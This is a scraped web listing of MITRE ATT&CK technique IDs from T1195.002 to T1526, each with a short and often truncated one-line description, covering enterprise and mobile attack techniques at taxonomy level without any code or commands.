Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise.

Compromise Software Supply Chain (T1195.002)
Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.

Compromise Hardware Supply Chain (T1195.003)
Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise.

Control Panel Items (T1196)
Windows Control Panel items are utilities that allow users to view and adjust computer settings.

BITS Jobs (T1197)
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks.

SIP and Trust Provider Hijacking (T1198)
In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe).

Trusted Relationship (T1199)
Adversaries may breach or otherwise leverage organizations who have access to intended victims.

Hardware Additions (T1200)
Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access.

Password Policy Discovery (T1201)
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.

Indirect Command Execution (T1202)
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

Exploitation for Client Execution (T1203)
Adversaries may exploit software vulnerabilities in client applications to execute code.

User Execution (T1204)
An adversary may rely upon specific actions by a user in order to gain execution.

Malicious Link (T1204.001)
An adversary may rely upon a user clicking a malicious link in order to gain execution.

Malicious File (T1204.002)
An adversary may rely upon a user opening a malicious file in order to gain execution.

Malicious Image (T1204.003)
Adversaries may rely on a user running a malicious image to facilitate execution.

Traffic Signaling (T1205)
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control.

Port Knocking (T1205.001)
Adversaries may use port knocking to hide open ports used for persistence or command and control.

Socket Filters (T1205.002)
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control.

Sudo Caching (T1206)
The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.

Rogue Domain Controller (T1207)
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data.

Kerberoasting (T1208)
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service.

Time Providers (T1209)
The Windows Time service (W32Time) enables time synchronization across and within domains.

Exploitation of Remote Services (T1210)
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network.

Exploitation for Defense Evasion (T1211)
Adversaries may exploit a system or application vulnerability to bypass security features.

Exploitation for Credential Access (T1212)
Adversaries may exploit software vulnerabilities in an attempt to collect credentials.

Data from Information Repositories (T1213)
Adversaries may leverage information repositories to mine valuable information.

Confluence (T1213.001)
Adversaries may leverage Confluence repositories to mine valuable information.

Sharepoint (T1213.002)
Adversaries may leverage the SharePoint repository as a source to mine valuable information.

Code Repositories (T1213.003)
Adversaries may leverage code repositories to collect valuable information.

Customer Relationship Management Software (T1213.004)
Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information.

Messaging Applications (T1213.005)
Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.

Credentials in Registry (T1214)
The Windows Registry stores configuration information that can be used by the system or other programs.

More Info

In Playbook

Kernel Modules and Extensions (T1215)

View on ATT&CK

Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.

More Info

In Playbook

System Script Proxy Execution (T1216)

View on ATT&CK

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files.

More Info

In Playbook
System Script Proxy Execution

PubPrn (T1216.001)

View on ATT&CK

Adversaries may use PubPrn to proxy execution of malicious remote files.

More Info

In Playbook
System Script Proxy Execution

SyncAppvPublishingServer (T1216.002)

View on ATT&CK

Adversaries may abuse SyncAppvPublishingServer.

More Info

In Playbook

Browser Information Discovery (T1217)

View on ATT&CK

Adversaries may enumerate information about browsers to learn more about compromised environments.

More Info

In Playbook

System Binary Proxy Execution (T1218)

View on ATT&CK

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

More Info

In Playbook
System Binary Proxy Execution

Compiled HTML File (T1218.001)

View on ATT&CK

Adversaries may abuse Compiled HTML files (.

More Info

In Playbook
System Binary Proxy Execution

Control Panel (T1218.002)

View on ATT&CK

Adversaries may abuse control.

More Info

In Playbook
System Binary Proxy Execution

CMSTP (T1218.003)

View on ATT&CK

Adversaries may abuse CMSTP to proxy execution of malicious code.

More Info

In Playbook
System Binary Proxy Execution

InstallUtil (T1218.004)

View on ATT&CK

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility.

More Info

In Playbook
System Binary Proxy Execution

Mshta (T1218.005)

View on ATT&CK

Adversaries may abuse mshta.

More Info

In Playbook
System Binary Proxy Execution

Msiexec (T1218.007)

View on ATT&CK

Adversaries may abuse msiexec.

More Info

In Playbook
System Binary Proxy Execution

Odbcconf (T1218.008)

View on ATT&CK

Adversaries may abuse odbcconf.

More Info

In Playbook
System Binary Proxy Execution

Regsvcs/Regasm (T1218.009)

View on ATT&CK

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility.

More Info

In Playbook
System Binary Proxy Execution

Regsvr32 (T1218.010)

View on ATT&CK

Adversaries may abuse Regsvr32.

More Info

In Playbook
System Binary Proxy Execution

Rundll32 (T1218.011)

View on ATT&CK

Adversaries may abuse rundll32.

More Info

In Playbook
System Binary Proxy Execution

Verclsid (T1218.012)

View on ATT&CK

Adversaries may abuse verclsid.

More Info

In Playbook
System Binary Proxy Execution

Mavinject (T1218.013)

View on ATT&CK

Adversaries may abuse mavinject.

More Info

In Playbook
System Binary Proxy Execution

MMC (T1218.014)

View on ATT&CK

Adversaries may abuse mmc.

More Info

In Playbook
System Binary Proxy Execution

Electron Applications (T1218.015)

View on ATT&CK

Adversaries may abuse components of the Electron framework to execute malicious code.

More Info

In Playbook

Remote Access Software (T1219)

View on ATT&CK

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.

More Info

In Playbook

XSL Script Processing (T1220)

View on ATT&CK

Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files.

More Info

In Playbook

Template Injection (T1221)

View on ATT&CK

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts.

More Info

In Playbook

File and Directory Permissions Modification (T1222)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook
File and Directory Permissions Modification

Windows File and Directory Permissions Modification (T1222.001)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook
File and Directory Permissions Modification

Linux and Mac File and Directory Permissions Modification (T1222.002)

View on ATT&CK

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.

More Info

In Playbook

Compiled HTML File (T1223)

View on ATT&CK

Compiled HTML files (.

More Info

In Playbook

Boot or Logon Initialization Scripts (T1398)

View on ATT&CK

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.

More Info

In Playbook

Modify Trusted Execution Environment (T1399)

View on ATT&CK

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user.

More Info

In Playbook

Modify System Partition (T1400)

View on ATT&CK

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

More Info

In Playbook

Device Administrator Permissions (T1401)

View on ATT&CK

Adversaries may request device administrator permissions to perform malicious actions.

More Info

In Playbook

Broadcast Receivers (T1402)

View on ATT&CK

An intent is a message passed between Android application or system components.

More Info

In Playbook

Modify Cached Executable Code (T1403)

View on ATT&CK

ART (the Android Runtime) compiles optimized code on the device itself to improve performance.

More Info

In Playbook

Exploitation for Privilege Escalation (T1404)

View on ATT&CK

Adversaries may exploit software vulnerabilities in order to elevate privileges.

More Info

In Playbook

Exploit TEE Vulnerability (T1405)

View on ATT&CK

A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone).

More Info

In Playbook

Obfuscated Files or Information (T1406)

View on ATT&CK

Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit.

More Info

In Playbook
Obfuscated Files or Information

Steganography (T1406.001)

View on ATT&CK

Adversaries may use steganography techniques in order to prevent the detection of hidden information.

More Info

In Playbook
Obfuscated Files or Information

Software Packing (T1406.002)

View on ATT&CK

Adversaries may perform software packing to conceal their code.

More Info

In Playbook

Download New Code at Runtime (T1407)

View on ATT&CK

Adversaries may download and execute dynamic code not included in the original application package after installation.

More Info

In Playbook

Disguise Root/Jailbreak Indicators (T1408)

View on ATT&CK

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan).

More Info

In Playbook

Stored Application Data (T1409)

View on ATT&CK

Adversaries may try to access and collect application data resident on the device.

More Info

In Playbook

Network Traffic Capture or Redirection (T1410)

View on ATT&CK

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

More Info

In Playbook

Input Prompt (T1411)

View on ATT&CK

The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII).

More Info

In Playbook

Capture SMS Messages (T1412)

View on ATT&CK

A malicious application could capture sensitive data sent via SMS, including authentication credentials.

More Info

In Playbook

Access Sensitive Data in Device Logs (T1413)

View on ATT&CK

On versions of Android prior to 4.

More Info

In Playbook

Clipboard Data (T1414)

View on ATT&CK

Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard.

More Info

In Playbook

URL Scheme Hijacking (T1415)

View on ATT&CK

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme).

More Info

In Playbook

URI Hijacking (T1416)

View on ATT&CK

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

More Info

In Playbook

Input Capture (T1417)

View on ATT&CK

Adversaries may use methods of capturing user input to obtain credentials or collect information.

More Info

In Playbook
Input Capture

Keylogging (T1417.001)

View on ATT&CK

Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.

More Info

In Playbook
Input Capture

GUI Input Capture (T1417.002)

View on ATT&CK

Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt.

More Info

In Playbook

Software Discovery (T1418)

View on ATT&CK

Adversaries may attempt to get a listing of applications that are installed on a device.

More Info

In Playbook
Software Discovery

Security Software Discovery (T1418.001)

View on ATT&CK

Adversaries may attempt to get a listing of security applications and configurations that are installed on a device.

More Info

In Playbook

Device Type Discovery (T1419)

View on ATT&CK

On Android, device type information is accessible to apps through the android.

More Info

In Playbook

File and Directory Discovery (T1420)

View on ATT&CK

Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem.

More Info

In Playbook

System Network Connections Discovery (T1421)

View on ATT&CK

Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network.

More Info

In Playbook

System Network Configuration Discovery (T1422)

View on ATT&CK

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems.

More Info

In Playbook
System Network Configuration Discovery

Internet Connection Discovery (T1422.001)

View on ATT&CK

Adversaries may check for Internet connectivity on compromised systems.

More Info

In Playbook
System Network Configuration Discovery

Wi-Fi Discovery (T1422.002)

View on ATT&CK

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

More Info

In Playbook

Network Service Scanning (T1423)

View on ATT&CK

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation.

More Info

In Playbook

Process Discovery (T1424)

View on ATT&CK

Adversaries may attempt to get information about running processes on a device.

More Info

In Playbook

Insecure Third-Party Libraries (T1425)

View on ATT&CK

.

More Info

In Playbook

System Information Discovery (T1426)

View on ATT&CK

Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture.

More Info

In Playbook

Attack PC via USB Connection (T1427)

View on ATT&CK

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android.

More Info

In Playbook

Exploitation of Remote Services (T1428)

View on ATT&CK

Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network.

More Info

In Playbook

Audio Capture (T1429)

View on ATT&CK

Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device.

More Info

In Playbook

Location Tracking (T1430)

View on ATT&CK

Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.

More Info

In Playbook
Location Tracking

Remote Device Management Services (T1430.001)

View on ATT&CK

An adversary may use access to cloud services (e.

More Info

In Playbook
Location Tracking

Impersonate SS7 Nodes (T1430.002)

View on ATT&CK

Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.

More Info

In Playbook

App Delivered via Web Download (T1431)

View on ATT&CK

.

More Info

In Playbook

Access Contact List (T1432)

View on ATT&CK

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.

More Info

In Playbook

Access Call Log (T1433)

View on ATT&CK

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

More Info

In Playbook

App Delivered via Email Attachment (T1434)

View on ATT&CK

.

More Info

In Playbook

Access Calendar Entries (T1435)

View on ATT&CK

An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

More Info

In Playbook

Commonly Used Port (T1436)

View on ATT&CK

Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection.

More Info

In Playbook

Application Layer Protocol (T1437)

View on ATT&CK

Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook
Application Layer Protocol

Web Protocols (T1437.001)

View on ATT&CK

Adversaries may communicate using application layer protocols associated with web protocols traffic to avoid detection/network filtering by blending in with existing traffic.

More Info

In Playbook

Exfiltration Over Other Network Medium (T1438)

View on ATT&CK

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel.

More Info

In Playbook

Eavesdrop on Insecure Network Communication (T1439)

View on ATT&CK

If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.

More Info

In Playbook

Detect App Analysis Environment (T1440)

View on ATT&CK

.

More Info

In Playbook

Stolen Developer Credentials or Signing Keys (T1441)

View on ATT&CK

.

More Info

In Playbook

Fake Developer Accounts (T1442)

View on ATT&CK

.

More Info

In Playbook

Remotely Install Application (T1443)

View on ATT&CK

.

More Info

In Playbook

Masquerade as Legitimate Application (T1444)

View on ATT&CK

An adversary could distribute developed malware by masquerading the malware as a legitimate application.

More Info

In Playbook

Abuse of iOS Enterprise App Signing Key (T1445)

View on ATT&CK

.

More Info

In Playbook

Device Lockout (T1446)

View on ATT&CK

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

More Info

In Playbook

Delete Device Data (T1447)

View on ATT&CK

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity.

More Info

In Playbook

Carrier Billing Fraud (T1448)

View on ATT&CK

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

More Info

In Playbook

Exploit SS7 to Redirect Phone Calls/SMS (T1449)

View on ATT&CK

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control.

More Info

In Playbook

Exploit SS7 to Track Device Location (T1450)

View on ATT&CK

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices.

More Info

In Playbook

SIM Card Swap (T1451)

View on ATT&CK

An adversary could convince the mobile network operator (e.

More Info

In Playbook

Manipulate App Store Rankings or Ratings (T1452)

View on ATT&CK

An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications.

More Info

In Playbook

Abuse Accessibility Features (T1453)

View on ATT&CK

**This technique has been deprecated.

More Info

In Playbook

Malicious SMS Message (T1454)

View on ATT&CK

Test.

More Info

In Playbook

Exploit Baseband Vulnerability (T1455)

View on ATT&CK

.

More Info

In Playbook

Drive-By Compromise (T1456)

View on ATT&CK

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing.

More Info

In Playbook

Malicious Media Content (T1457)

View on ATT&CK

.

More Info

In Playbook

Replication Through Removable Media (T1458)

View on ATT&CK

Adversaries may move onto devices by exploiting or copying malware to devices connected via USB.

More Info

In Playbook

Device Unlock Code Guessing or Brute Force (T1459)

View on ATT&CK

.

More Info

In Playbook

Biometric Spoofing (T1460)

View on ATT&CK

.

More Info

In Playbook

Lockscreen Bypass (T1461)

View on ATT&CK

An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen.

More Info

In Playbook

Malicious Software Development Tools (T1462)

View on ATT&CK

.

More Info

In Playbook

Manipulate Device Communication (T1463)

View on ATT&CK

If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected.

More Info

In Playbook

Network Denial of Service (T1464)

View on ATT&CK

Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users.

More Info

In Playbook

Rogue Wi-Fi Access Points (T1465)

View on ATT&CK

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

More Info

In Playbook

Downgrade to Insecure Protocols (T1466)

View on ATT&CK

An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187).

More Info

In Playbook

Rogue Cellular Base Station (T1467)

View on ATT&CK

An adversary could set up a rogue cellular base station and then use it to eavesdrop on or manipulate cellular device communication.

More Info

In Playbook

Remotely Track Device Without Authorization (T1468)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.

More Info

In Playbook

Remotely Wipe Data Without Authorization (T1469)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.

More Info

In Playbook

Obtain Device Cloud Backups (T1470)

View on ATT&CK

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.

More Info

In Playbook

Data Encrypted for Impact (T1471)

View on ATT&CK

An adversary may encrypt files stored on a mobile device to prevent the user from accessing them.

More Info

In Playbook

Generate Fraudulent Advertising Revenue (T1472)

View on ATT&CK

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

More Info

In Playbook

Malicious or Vulnerable Built-in Device Functionality (T1473)

View on ATT&CK

.

More Info

In Playbook

Supply Chain Compromise (T1474)

View on ATT&CK

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Dependencies and Development Tools (T1474.001)

View on ATT&CK

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Hardware Supply Chain (T1474.002)

View on ATT&CK

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook
Supply Chain Compromise

Compromise Software Supply Chain (T1474.003)

View on ATT&CK

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise.

More Info

In Playbook

Deliver Malicious App via Authorized App Store (T1475)

View on ATT&CK

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices.

More Info

In Playbook

Deliver Malicious App via Other Means (T1476)

View on ATT&CK

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices.

More Info

In Playbook

Exploit via Radio Interfaces (T1477)

View on ATT&CK

The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.

More Info

In Playbook

Install Insecure or Malicious Configuration (T1478)

View on ATT&CK

An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings.

More Info

In Playbook

Execution Guardrails (T1480)

View on ATT&CK

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target.

More Info

In Playbook
Execution Guardrails

Environmental Keying (T1480.001)

View on ATT&CK

Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment.

More Info

In Playbook
Execution Guardrails

Mutual Exclusion (T1480.002)

View on ATT&CK

Adversaries may constrain execution or actions based on the presence of a mutex associated with malware.

More Info

In Playbook

Web Service (T1481)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system.

More Info

In Playbook
Web Service

Dead Drop Resolver (T1481.001)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure.

More Info

In Playbook
Web Service

Bidirectional Communication (T1481.002)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system.

More Info

In Playbook
Web Service

One-Way Communication (T1481.003)

View on ATT&CK

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to a compromised system without receiving return output.

More Info

In Playbook

Domain Trust Discovery (T1482)

View on ATT&CK

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

More Info

In Playbook

Domain Generation Algorithms (T1483)

View on ATT&CK

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains.

More Info

In Playbook

Domain or Tenant Policy Modification (T1484)

View on ATT&CK

Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments.

More Info

In Playbook
Domain or Tenant Policy Modification

Group Policy Modification (T1484.001)

View on ATT&CK

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain.

More Info

In Playbook
Domain or Tenant Policy Modification

Trust Modification (T1484.002)

View on ATT&CK

Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.

More Info

In Playbook

Data Destruction (T1485)

View on ATT&CK

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.

More Info

In Playbook
Data Destruction

Lifecycle-Triggered Deletion (T1485.001)

View on ATT&CK

Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.

More Info

In Playbook

Data Encrypted for Impact (T1486)

View on ATT&CK

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Disk Structure Wipe (T1487)

View on ATT&CK

Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Disk Content Wipe (T1488)

View on ATT&CK

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

More Info

In Playbook

Service Stop (T1489)

View on ATT&CK

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users.

More Info

In Playbook

Inhibit System Recovery (T1490)

View on ATT&CK

Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.

Defacement (T1491): Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content.
  Internal Defacement (T1491.001): An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems.
  External Defacement (T1491.002): An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.

Stored Data Manipulation (T1492): Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.

Transmitted Data Manipulation (T1493): Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.

Runtime Data Manipulation (T1494): Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.

Firmware Corruption (T1495): Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.

Resource Hijacking (T1496): Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
  Compute Hijacking (T1496.001): Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
  Bandwidth Hijacking (T1496.002): Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
  SMS Pumping (T1496.003): Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.
  Cloud Service Hijacking (T1496.004): Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.

Virtualization/Sandbox Evasion (T1497): Adversaries may employ various means to detect and avoid virtualization and analysis environments.
  System Checks (T1497.001): Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.
  User Activity Based Checks (T1497.002): Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments.
  Time Based Evasion (T1497.003): Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments.

Network Denial of Service (T1498): Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users.
  Direct Network Flood (T1498.001): Adversaries may attempt to cause a denial of service (DoS) by directly sending a high volume of network traffic to a target.
  Reflection Amplification (T1498.002): Adversaries may attempt to cause a denial of service (DoS) by reflecting a high volume of network traffic to a target.

Endpoint Denial of Service (T1499): Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.
  OS Exhaustion Flood (T1499.001): Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS).
  Service Exhaustion Flood (T1499.002): Adversaries may target the different network services provided by systems to conduct a denial of service (DoS).
  Application Exhaustion Flood (T1499.003): Adversaries may target resource-intensive features of applications to cause a denial of service (DoS), denying availability to those applications.
  Application or System Exploitation (T1499.004): Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users.

Compile After Delivery (T1500): Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code.

Systemd Service (T1501): Systemd services can be used to establish persistence on a Linux system.

Parent PID Spoofing (T1502): Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.

Credentials from Web Browsers (T1503): Adversaries may acquire credentials from web browsers by reading files specific to the target browser.

PowerShell Profile (T1504): Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.

Server Software Component (T1505): Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.
  SQL Stored Procedures (T1505.001): Adversaries may abuse SQL stored procedures to establish persistent access to systems.
  Transport Agent (T1505.002): Adversaries may abuse Microsoft transport agents to establish persistent access to systems.
  Web Shell (T1505.003): Adversaries may backdoor web servers with web shells to establish persistent access to systems.
  IIS Components (T1505.004): Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence.
  Terminal Services DLL (T1505.005): Adversaries may abuse components of Terminal Services to enable persistent access to systems.

Web Session Cookie (T1506): Adversaries can use stolen session cookies to authenticate to web applications and services.

Network Information Discovery (T1507): Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.

Suppress Application Icon (T1508): A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application.

Non-Standard Port (T1509): Adversaries may generate network traffic using a protocol and port pairing that are typically not associated.

Clipboard Modification (T1510): Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.

Video Capture (T1512): An adversary can leverage a device’s cameras to gather information by capturing video recordings.

Screen Capture (T1513): Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information.

Elevated Execution with Prompt (T1514): Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.

Input Injection (T1516): A malicious application can inject input to the user interface to mimic user interaction through the abuse of Android's accessibility APIs.

Access Notifications (T1517): Adversaries may collect data within notifications sent by the operating system or other applications.

Software Discovery (T1518): Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.
  Security Software Discovery (T1518.001): Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.

Emond (T1519): Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers.

Domain Generation Algorithms (T1520): Adversaries may use [Domain Generation Algorithms](https://attack.

Encrypted Channel (T1521): Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
  Symmetric Cryptography (T1521.001): Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol.
  Asymmetric Cryptography (T1521.002): Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol.
  SSL Pinning (T1521.003): Adversaries may use [SSL Pinning](https://attack.

Cloud Instance Metadata API (T1522): Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Evade Analysis Environment (T1523): Malicious applications may attempt to detect their operating environment prior to fully executing their payloads.

Implant Internal Image (T1525): Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment.

Cloud Service Discovery (T1526): An adversary may attempt to enumerate the cloud services running on a system after gaining access.

